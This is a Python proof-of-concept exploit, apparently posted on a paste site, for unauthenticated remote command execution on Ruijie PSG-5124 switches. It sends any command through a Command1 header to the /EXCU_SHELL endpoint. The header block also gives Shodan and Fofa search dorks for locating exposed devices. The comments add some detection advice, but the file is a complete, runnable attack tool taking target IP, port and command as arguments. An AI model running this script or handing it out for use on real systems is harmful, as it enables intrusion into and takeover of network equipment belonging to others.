FlyFar

Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)

Mar 14th, 2024
Python 1.85 KB | Cybersecurity | 0 0
  1. #- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
  2. #- Shodan Dork: http.html_hash:-1402735717
  3. #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
  4. #- Exploit Author: ByteHunter
  5. #- Email: 0xByteHunter@proton.me
  6. #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
  7. #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
  8.  
  9. import http.client
  10. import argparse
  11.  
  def send_request(ip, port, command):
      """Issue one GET for /EXCU_SHELL with *command* in the Command1 header and print the reply.

      The request built here attaches no cookie, token or Authorization
      header; the only request-specific data is the Cmdnum / Confirm1 /
      Command1 header trio. For defenders this is the observable signature:
      a GET for /EXCU_SHELL carrying a Command1 header, seen in proxy, WAF or
      management-plane logs. The switch's web management interface should not
      be reachable from untrusted networks.

      Args:
          ip: Host part of the device address, interpolated as-is.
          port: Port part of the device address, interpolated as-is.
          command: Text placed verbatim in the Command1 header.

      Returns:
          None. The status code and body (or the failure reason) are printed.
      """
      endpoint = f"{ip}:{port}"

      # Insertion order is kept so the headers are sent in the same sequence.
      header_pairs = [
          ("Host", endpoint),
          ("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"),
          ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"),
          ("Accept-Language", "en-US,en;q=0.5"),
          ("Accept-Encoding", "gzip, deflate, br"),
          ("DNT", "1"),
          ("Connection", "close"),
          ("Upgrade-Insecure-Requests", "1"),
          # The three custom headers below are what distinguishes this request
          # from ordinary browser traffic to the management page.
          ("Cmdnum", "1"),
          ("Confirm1", "n"),
          ("Content-Length", "0"),
          ("Command1", command),
      ]
      request_headers = dict(header_pairs)

      try:
          # Plain HTTP: the request and the reply cross the network unencrypted.
          conn = http.client.HTTPConnection(endpoint)
          conn.request("GET", "/EXCU_SHELL", headers=request_headers)
          reply = conn.getresponse()

          status_line = f"Status Code: {reply.status}"
          print(status_line)
          body_text = reply.read().decode('utf-8')
          print(body_text)
          # Reached only on the success path; a failure above skips the close.
          conn.close()

      except Exception as e:
          print(f"Request failed: {e}")
  40.  
  if __name__ == "__main__":
      # Command-line entry point: three mandatory options, passed straight to
      # send_request() without any validation or conversion (the port stays a
      # string because it is only interpolated into "host:port").
      parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
      for option, help_text in (
          ('--ip', 'Target IP address'),
          ('--port', 'Port'),
          ('--cmd', 'Command'),
      ):
          parser.add_argument(option, help=help_text, required=True)

      args = parser.parse_args()
      send_request(args.ip, args.port, args.cmd)